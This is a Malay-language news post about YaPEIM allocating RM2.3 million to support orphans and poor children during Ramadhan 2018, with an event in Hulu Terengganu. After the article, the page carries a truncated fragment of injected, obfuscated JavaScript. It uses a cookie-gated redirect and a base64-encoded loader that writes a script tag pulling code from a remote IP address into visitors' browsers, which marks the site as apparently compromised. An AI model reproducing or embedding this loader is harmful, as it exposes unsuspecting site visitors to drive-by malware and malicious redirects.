YaPEIM » YaPEIM PERUNTUK RM2.3 JUTA SANTUNI ANAK YATIM, MISKIN SEMPENA RAMADHAN

Terkini

YaPEIM PERUNTUK RM2.3 JUTA SANTUNI ANAK YATIM, MISKIN SEMPENA RAMADHAN

Program berkenaan bertujuan mengimarahkan bulan ramadhan dengan aktiviti-aktiviti yang lebih tersusun bagi melahirkan masyarakat yang beriman dan beramal soleh selain meraikan anak yatim & miskin dari seluruh negeri Terengganu.

HULU TERENGGANU, 4 JUN 2018: Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) memperuntukkan RM2.3 juta bagi menyantuni anak-anak yatim dan miskin di seluruh negara sempena bulan Ramadhan tahun ini.

Program Inspirasi Ramadhan YaPEIM 2018 bersamaan 1439H itu dijangka memberi manfaat kepada 14,000 kumpulan sasar berkenaan di 14 buah lokasi seluruh negara.

Sehingga kini, YaPEIM telah memperuntukkan lebih RM7 juta bagi pelaksanaan program ini dengan melibatkan lebih 60,000 orang penerima manfaat keseluruhannya.

Bagi negeri Terengganu, sejumlah RM120,000 peruntukkan diagih kepada 1,000 orang anak yatim & miskin dan mereka menerima sumbangan berupa wang tunai RM100 setiap seorang dan barangan berbentuk bahan ilmiah.

Majlis yang berlangsung di Masjid Hadhari Tok Randok, Ajil, Hulu Terengganu ini dirasmikan oleh YBhg. Dato’ Abibullah Haji Samsudin, Ketua Pengarah YaPEIM.

Turut hadir dalam majlis itu YB Maliaman Kassim, Ahli Dewan Undangan Negeri Ajil.

Program Inspirasi Ramadhan YaPEIM mula dilaksanakan pada 2016 dan diteruskan pada 2017 di seluruh negara bagi menyantuni anak yatim & miskin disamping mengimarahkan bulan ramadhan dengan aktiviti keagamaan dan kebajikan.

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top